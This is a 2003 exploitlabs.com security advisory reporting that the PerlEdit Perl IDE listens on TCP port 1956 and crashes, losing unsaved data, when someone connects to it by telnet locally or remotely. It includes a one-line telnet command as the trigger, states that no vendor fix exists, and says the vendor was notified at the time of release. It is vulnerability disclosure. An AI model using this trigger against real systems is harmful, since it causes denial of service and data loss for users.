------------------------------------------------------------------
          - EXPL-A-2003-010 exploitlabs.com Advisory 010
------------------------------------------------------------------
                         -= PerlEdit =-


exploitlabs.com
June 21, 2003


Vunerability:
-------------
Remote Buffer Overflow

Product:
--------
PerlEdit
http://www.indigostar.com/perledit.html


Description of product:
-----------------------
"PerlEdit is an IDE for Perl and a general-purpose text editor.
It includes a source code text editor with syntax highlighting
and a visual debugger."

screenshot: http://www.indigostar.com/perledit_screenshots.html  



VUNERABILITY / EXPLOIT
======================

 Upon execution perledit binds to local TCP port 1956.
By connecting via Telnet localy or remotely causes the program
to crash, resulting in a total loss of unsaved data.

------------- 'sploit -------------------------

telnet host-running-perledit 1956

READY

( exit telnet ) remote perledit crashes.


 Further investigation may lead to more serious issues, I did not
persue as this was bad enough.


Local:
------
yes


Remote:
-------
yes


Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
support@indigostar.com - Concurrent with this advisory


Credits:
--------
Donnie Werner
http://exploitlabs.com
http://nothackers.org - Freedom of Voice - Freedom of Choice